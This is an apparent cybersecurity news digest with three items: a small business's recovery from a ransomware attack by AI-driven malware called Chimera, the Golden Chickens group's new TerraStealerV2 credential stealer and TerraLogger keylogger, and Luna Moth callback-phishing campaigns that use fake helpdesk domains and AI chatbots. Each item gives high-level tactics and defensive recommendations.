AI-Powered Chimera Malware Cripples Small Business in Coordinated Cross-Platform Attack
A small e-commerce business, X Business, recently fell victim to a fast-moving cyberattack powered by an advanced AI-driven malware called Chimera. What began as a routine update to their inventory system escalated in under half a day, resulting in a complete shutdown of operations. Customer transactions stopped, employee accounts were disabled, and a $250,000 cryptocurrency ransom demand followed, threatening to leak sensitive customer data. Chimera’s attack vector combined zero-day exploits, code mutation, and cross-platform compatibility making it highly evasive and effective. On Windows, it abused the Print Spooler service; on macOS, it bypassed Gatekeeper by forging valid code signatures during execution. Social engineering was used to distribute the payload, with spoofed internal messages over email and Slack tricking staff into triggering the infection. The malware hid in plain sight, mimicking normal system processes until the damage was already done. The business’s recovery process spanned 48 hours, requiring external cybersecurity support and a layered response strategy. EDR platforms were used to detect Chimera’s dynamic behavior and reverse its impact across compromised devices. Data was restored from secure offline backups using solutions designed for both Windows and macOS environments. Patching and remediation were done immediately, closing off vulnerabilities exploited during the intrusion. Network access controls were overhauled, replacing traditional trust models with Zero Trust to limit internal movement. DNS and domain filtering tools were deployed to prevent callback communications from reoccurring. The incident exposed how underprepared small businesses often are for targeted, sophisticated attacks and highlighted the need for proactive defense. Strategies like segmented backups, AI-assisted monitoring, and regular employee training must become the baseline, not the exception.
Golden Chickens Expand Toolkit with TerraStealerV2 and TerraLogger
Golden Chickens, also known as Venom Spider, is a financially motivated cybercrime group active since 2018 and best known for offering malware under a malware-as-a-service (MaaS) model. The group is associated with various modular attack tools, including the infamous More_eggs malware and its variants, often distributed through phishing campaigns targeting corporate environments. Operating under the online persona “badbullzvenom,” which is believed to be jointly managed by individuals based in Canada and Romania, Golden Chickens has built a reputation for developing stealthy, adaptable payloads designed for credential theft, access operations, and post-exploitation activities. Their tools are frequently delivered using Windows shortcuts (LNKs), malicious installers, and trusted system processes, making detection difficult. This group’s malware has consistently targeted high-value enterprise users, using social engineering and obfuscation tactics to avoid traditional defenses. Their latest additions, TerraStealerV2 and TerraLogger, reflect ongoing development to expand their reach and refine existing capabilities. TerraStealerV2 is built to extract browser-stored credentials, cryptocurrency wallet information, and browser extension data. It’s distributed in multiple formats—including EXE, DLL, MSI, and LNK—and the payload is retrieved from an external domain using Microsoft’s OCX framework. Though designed to steal Chrome credentials, it cannot bypass recent Application Bound Encryption (ABE) protections, indicating the malware is either still being tested or fully adapted. It uses built-in Windows tools like regsvr32[.]exe and mshta[.]exe for stealth and transmits stolen data to Telegram and its hosting domain. TerraLogger, on the other hand, is a rudimentary keylogger that lacks data exfiltration or command-and-control features, suggesting it is either in early development or intended to work in conjunction with different tools. These additions come amid broader competition among threat actors and updated stealers, pushing toward faster, more efficient credential theft and data exfiltration at scale.
Luna Moth Expands Phishing Campaigns with Fake Helpdesk Domains and AI Chatbots
The Luna Moth threat group, tracked under names including Silent Ransom Group, UNC3753, and Storm-0252, has significantly escalated its phishing operations since March 2025. The group uses fake IT support domains crafted to mimic legitimate helpdesk portals closely. These domains follow predictable patterns, typically combining a company name with “help” or “helpdesk” and using registrars like GoDaddy and nameservers from domaincontrol.com. The group sends phishing emails instructing recipients to call fake helpdesk numbers, where victims are guided into credential theft or remote access installation. One notable tactic involves embedding AI-powered chatbots on spoofed support pages to simulate real-time IT support. Victims are then tricked into installing remote access tools such as AnyDesk or ScreenConnect, granting attackers direct control without dropping any malware. This hands-on method bypasses traditional email filters and security tools by shifting the attack surface from inboxes to human interaction. EclecticIQ and Silent Push investigations have confirmed that over 50 domains have been registered under this scheme, primarily aimed at U.S.-based law firms and financial institutions. Legal services account for over 40% of identified targets, highlighting the attackers’ focus on data-rich, high-trust environments. After gaining access, attackers use legitimate tools to exfiltrate sensitive files and issue ransom demands ranging from $1 million to $8 million, leveraging a leak site to pressure victims. Security teams are encouraged to implement domain monitoring using specific regex patterns, registrar and nameserver filters, and registration date criteria to flag suspicious domains early. Regular audits for unexpected remote access tools and staff education around callback phishing scenarios are now critical defenses. Luna Moth’s shift to infrastructure-based deception, combined with AI-enhanced social engineering, reflects a growing trend of blending technical and psychological tactics to bypass perimeter defenses. The scale and precision of this campaign suggest it is far from over and likely to expand further across industries handling sensitive or regulated data.
